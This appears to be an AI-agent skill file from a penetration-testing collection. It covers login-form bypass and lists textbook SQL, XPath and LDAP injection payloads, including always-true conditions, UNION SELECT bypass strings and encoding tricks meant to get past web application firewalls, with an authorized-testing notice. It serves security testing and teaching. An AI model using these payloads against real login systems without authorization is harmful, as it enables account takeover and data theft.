Hacktricks-skills sql-login-bypass

SQL injection payloads for testing login form vulnerabilities. Use this skill when you need to test for SQL injection vulnerabilities in authentication forms, when analyzing login bypass techniques, or when conducting authorized penetration testing on web applications. This skill provides a comprehensive collection of SQL injection payloads for XPath, LDAP, and SQL injection attacks. Make sure to use this skill whenever the user mentions SQL injection, login bypass, authentication testing, web security testing, or penetration testing on login forms.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/login-bypass/sql-login-bypass/SKILL.MD

source content

SQL Login Bypass Payloads

This skill provides a comprehensive collection of payloads to bypass login forms via XPath injection, LDAP injection, and SQL injection.

⚠️ Legal and Ethical Notice

Only use these payloads on systems you own or have explicit written authorization to test. Unauthorized access to computer systems is illegal and unethical. These techniques are for:

Authorized penetration testing engagements
Security research on your own systems
Educational purposes in controlled environments
Bug bounty programs with proper scope

How to Use These Payloads

Method 1: Bulk Testing

Put the first 200 lines of the payload list as both username and password fields to quickly test for vulnerabilities.

Method 2: Targeted Testing

Put the complete payload list in the username field with a known password (like
```
Pass1234.
```
)
Put the complete payload list in the password field with a known username (like
```
admin
```
)

Method 3: Manual Testing

Select specific payloads based on the application's behavior and error messages.

Payload Categories

The payloads are organized in this order:

XPath Injection - For applications using XPath for authentication
LDAP Injection - For applications using LDAP directories
SQL Injection - For applications using SQL databases

Common SQL Injection Patterns

Basic Tautologies

```
' or '1'='1
```
- Classic always-true condition
```
' or 1=1--
```
- Comment out the rest of the query
```
' or 'x'='x
```
- Alternative tautology

UNION-Based

```
' UNION ALL SELECT 1,2--
```
- Extract data from other tables

' AND 1=0 UNION ALL SELECT 'admin', 'hash

- Bypass with known credentials

Comment-Based

```
--
```
(MySQL, PostgreSQL)
```
#
```
(MySQL)
```
/*
```
(SQL Server, PostgreSQL)

Encoding Variations

URL-encoded:
```
%27
```
for
```
'
```
Double encoding for WAF bypass
Case variations:
```
UnION
```
,
```
SeLeCT
```

When to Use Each Payload Type

Scenario	Recommended Payload
Basic SQL injection test	`' or '1'='1`
UNION-based extraction	`' UNION ALL SELECT 1,2--`
Hash-based bypass	`' AND 1=0 UNION ALL SELECT 'admin', 'hash`
XPath injection	`'or string-length(name(.))<10 or'`
LDAP injection	`*)(
WAF bypass attempts	URL-encoded or case-mixed variants

Best Practices

Start simple - Begin with basic payloads before trying complex ones
Observe responses - Different error messages indicate different vulnerabilities
Document findings - Keep records of what works for reporting
Respect scope - Only test what you're authorized to test
Use proper tools - Consider using automated scanners like SQLMap for comprehensive testing

Reference Files

For the complete payload list, see

references/sql-injection-payloads.txt

- this contains 400+ payloads organized by injection type.

Next Steps After Finding a Vulnerability

Confirm the vulnerability - Test with multiple payloads
Determine the database type - Error messages often reveal this
Assess impact - What data can be accessed?
Document responsibly - Create a clear report for remediation
Recommend fixes - Suggest parameterized queries, input validation, etc.

Related Skills

Web application security testing
Database security assessment
Authentication bypass techniques
WAF evasion methods